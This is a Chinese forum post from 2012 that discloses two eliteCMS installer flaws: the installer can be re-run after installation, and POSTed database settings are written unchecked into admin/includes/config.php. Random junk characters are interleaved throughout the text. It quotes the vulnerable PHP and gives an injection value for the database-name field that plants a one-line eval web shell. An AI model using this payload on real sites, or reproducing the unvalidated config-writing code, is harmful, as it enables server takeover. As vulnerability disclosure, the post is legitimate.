eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
2 | |4 I9 G- L* C: r4 Y1 S
% a+ U2 D( I5 |9 B0 J" ~; d4 S2 j# R另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
7 J; {6 b6 I5 b& k C0 l我们来看代码:
* Z$ w5 t: j7 M/ S' [0 o A
, \4 k; }8 @9 d' { B2 n7 |5 v& F' _...' Z# z2 y# B8 l3 v! I) m5 C
elseif ($_GET['step'] == "4") {
0 G* w3 _5 f6 ]4 V5 g% T, A $file = "../admin/includes/config.php";
( y0 \- q3 a5 Z! I L $write = "<?php\n";
4 ^: ?7 s0 B; |! w* J7 P $write .= "/**\n";
' j9 S% U# c6 ?3 b% B3 B $write .= "*\n";7 v" V" G- }9 e) h
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
& G9 i# y. _+ t4 R; I...略...- E+ I- J" c8 ^1 A$ v2 f
$write .= "*\n";# Q; A8 h" K( p8 a) E
$write .= "*/\n";
9 f- M! M0 K% q7 b3 v4 [% l $write .= "\n"; n$ ^$ G* w) q V2 n; G! G
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n"; T& a; r4 I+ F
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% I' d$ |4 Z+ u: x* s% q $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
5 e* b# w6 ?( Y" L4 n6 D/ R# w) r $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
+ D/ c$ z: P: d" x $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n"; M4 U% o4 D W
$write .= "if (!\$connection) {\n";
2 {1 e* h8 l8 e; k& E $write .= " die(\"Database connection failed\" .mysql_error());\n";3 p p- B6 u; v8 t- J; Q3 P
$write .= " \n";
0 L1 B3 w3 v5 o& o* e $write .= "} \n";
! y- E4 F3 U& H$ P3 H+ f/ X" K $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
$ ~! r9 T k9 h( _. q% e $write .= "if (!\$db_select) {\n";6 M8 n: [; F, J1 U
$write .= " die(\"Database select failed\" .mysql_error());\n";
& ~) m$ C6 _/ K/ ` $write .= " \n";
6 [7 z# i" V: ` $write .= "} \n";
( C2 E, E- v! G( Z' P! x $write .= "?>\n";
& D& M" m4 v, o$ J
( W3 |( l1 t$ j: G $writer = fopen($file, 'w');
' O8 z5 X! u; T/ ~...4 S$ w# c* B( Z- }" ^$ S
; @- F9 O Q6 Q; v! y1 l在看代码:
/ ]+ d4 B' |/ z! y3 m* S% E1 t
: }+ [' B ] |( _" n- Q$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
1 C+ V3 i# Q' X, }$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
% ]3 o- o, o! ~: c$_SESSION['DB_USER'] = $_POST['DB_USER'];' ^( Y3 a* U: Q7 {$ b9 n8 g
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
/ ^3 y0 g3 y# k" h+ ~
@" X/ H, t4 O' l: m取值未作任何验证
5 Z+ U: x9 F3 i) X6 ], O( x% Y如果将数据库名POST数据:" D6 S4 Z: c) R3 j( O% k
9 L7 t1 \9 h; q) D4 s2 g$ g! e7 o0 S"?><?php eval($_POST[c]);?><?php
+ d: R/ K U3 u8 v+ r j5 Z
* b' p6 @; ]% a4 p, p: o. m1 q3 b将导致一句话后门写入/admin/includes/config.php0 O+ R5 G- y3 y, Z' v
|
发表于 2012-11-18 13:59:27
收藏
支持
反对